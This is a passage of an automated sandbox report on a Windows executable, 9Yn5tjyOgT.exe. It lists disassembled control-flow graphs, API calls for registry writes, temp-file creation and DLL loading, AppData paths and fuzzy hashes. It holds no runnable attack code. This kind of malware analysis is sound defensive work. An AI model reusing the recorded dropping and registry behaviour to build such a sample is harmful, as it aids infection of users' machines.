                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                      • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                    • String ID: 9
                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                    • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                    • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                    • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                    • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 969 40678c-4067bf wsprintfW LoadLibraryExW 966->969 967->966 968 406785-406787 967->968 968->969
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                    • wsprintfW.USER32 ref: 004067A4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                    • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                    • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                    • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                    • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 970 40591f-40596a CreateDirectoryW 971 405970-40597d GetLastError 970->971 972 40596c-40596e 970->972 973 405997-405999 971->973 974 40597f-405993 SetFileSecurityW 971->974 972->973 974->972 975 405995 GetLastError 974->975 975->973
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                    • GetLastError.KERNEL32 ref: 00405976
                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                    • GetLastError.KERNEL32 ref: 00405995
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                    • API String ID: 3449924974-3125694417
                                                                                                                    • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                    • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                    • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                    • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 976 405f0d-405f19 977 405f1a-405f4e GetTickCount GetTempFileNameW 976->977 978 405f50-405f52 977->978 979 405f5d-405f5f 977->979 978->977 980 405f54 978->980 981 405f57-405f5a 979->981 980->981
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF), ref: 00405F46
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                    • String ID: "C:\Users\user\Desktop\9Yn5tjyOgT.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                    • API String ID: 1716503409-1122705673
                                                                                                                    • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                    • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                    • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                    • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 982 738e1777-738e17b6 call 738e1b5f 986 738e17bc-738e17c0 982->986 987 738e18d6-738e18d8 982->987 988 738e17c9-738e17d6 call 738e2394 986->988 989 738e17c2-738e17c8 call 738e2352 986->989 994 738e17d8-738e17dd 988->994 995 738e1806-738e180d 988->995 989->988 998 738e17df-738e17e0 994->998 999 738e17f8-738e17fb 994->999 996 738e180f-738e182b call 738e2569 call 738e15b4 call 738e1272 GlobalFree 995->996 997 738e182d-738e1831 995->997 1022 738e1885-738e1889 996->1022 1000 738e187e-738e1884 call 738e2569 997->1000 1001 738e1833-738e187c call 738e15c6 call 738e2569 997->1001 1004 738e17e8-738e17e9 call 738e2aac 998->1004 1005 738e17e2-738e17e3 998->1005 999->995 1002 738e17fd-738e17fe call 738e2d37 999->1002 1000->1022 1001->1022 1015 738e1803 1002->1015 1018 738e17ee 1004->1018 1010 738e17e5-738e17e6 1005->1010 1011 738e17f0-738e17f6 call 738e2724 1005->1011 1010->995 1010->1004 1021 738e1805 1011->1021 1015->1021 1018->1015 1021->995 1025 738e188b-738e1899 call 738e252c 1022->1025 1026 738e18c6-738e18cd 1022->1026 1032 738e189b-738e189e 1025->1032 1033 738e18b1-738e18b8 1025->1033 1026->987 1028 738e18cf-738e18d0 GlobalFree 1026->1028 1028->987 1032->1033 1035 738e18a0-738e18a8 1032->1035 1033->1026 1034 738e18ba-738e18c5 call 738e153d 1033->1034 1034->1026 1035->1033 1037 738e18aa-738e18ab FreeLibrary 1035->1037 1037->1033
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 738E1B5F: GlobalFree.KERNEL32(?), ref: 738E1DB2
                                                                                                                      • Part of subcall function 738E1B5F: GlobalFree.KERNEL32(?), ref: 738E1DB7
                                                                                                                      • Part of subcall function 738E1B5F: GlobalFree.KERNEL32(?), ref: 738E1DBC
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1825
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 738E18AB
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E18D0
                                                                                                                      • Part of subcall function 738E2352: GlobalAlloc.KERNEL32(00000040,?), ref: 738E2383
                                                                                                                      • Part of subcall function 738E2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,738E17F6,00000000), ref: 738E27F4
                                                                                                                      • Part of subcall function 738E15C6: wsprintfW.USER32 ref: 738E15F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3962662361-3916222277
                                                                                                                    • Opcode ID: 68b81496ae38aeb72d30f2c46e0b5671020c2e9870da3128ca4e4db22c652b14
                                                                                                                    • Instruction ID: 3925fa4aa08fe38d1bc1a20997c77d2194638680e963f52dbfcf5506fbeb0f60
                                                                                                                    • Opcode Fuzzy Hash: 68b81496ae38aeb72d30f2c46e0b5671020c2e9870da3128ca4e4db22c652b14
                                                                                                                    • Instruction Fuzzy Hash: 9241C4B25803189BEB11AFF4D985B8537AEBB07311F1885B9FD1B9A1C6DB78C084C760

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1039 4023e4-402415 call 402c41 * 2 call 402cd1 1046 402ac5-402ad4 1039->1046 1047 40241b-402425 1039->1047 1049 402427-402434 call 402c41 lstrlenW 1047->1049 1050 402438-40243b 1047->1050 1049->1050 1053 40243d-40244e call 402c1f 1050->1053 1054 40244f-402452 1050->1054 1053->1054 1057 402463-402477 RegSetValueExW 1054->1057 1058 402454-40245e call 4031d6 1054->1058 1061 402479 1057->1061 1062 40247c-40255d RegCloseKey 1057->1062 1058->1057 1061->1062 1062->1046 1064 40288b-402892 1062->1064 1064->1046
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp
                                                                                                                    • API String ID: 2655323295-176820986
                                                                                                                    • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                    • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                                    • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                    • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1065 402d44-402d6d call 406255 1067 402d72-402d74 1065->1067 1068 402d76-402d7c 1067->1068 1069 402dec-402df0 1067->1069 1070 402d98-402dad RegEnumKeyW 1068->1070 1071 402d7e-402d80 1070->1071 1072 402daf-402dc1 RegCloseKey call 4067c2 1070->1072 1073 402dd0-402dde RegCloseKey 1071->1073 1074 402d82-402d96 call 402d44 1071->1074 1079 402de0-402de6 RegDeleteKeyW 1072->1079 1080 402dc3-402dce 1072->1080 1073->1069 1074->1070 1074->1072 1079->1069 1080->1069
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$Enum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 464197530-0
                                                                                                                    • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                    • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                    • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                    • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405D76
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                      • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw\Vehefte190,?,00000000,000000F0), ref: 0040164D
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Iw\Vehefte190, xrefs: 00401640
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Iw\Vehefte190
                                                                                                                    • API String ID: 1892508949-1534214271
                                                                                                                    • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                    • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                                    • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                    • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                      • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                    • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                    • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                    • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                    • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseQueryValue
                                                                                                                    • String ID: Call
                                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                                    • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                    • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                                    • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                    • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                    • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                    • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                    • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
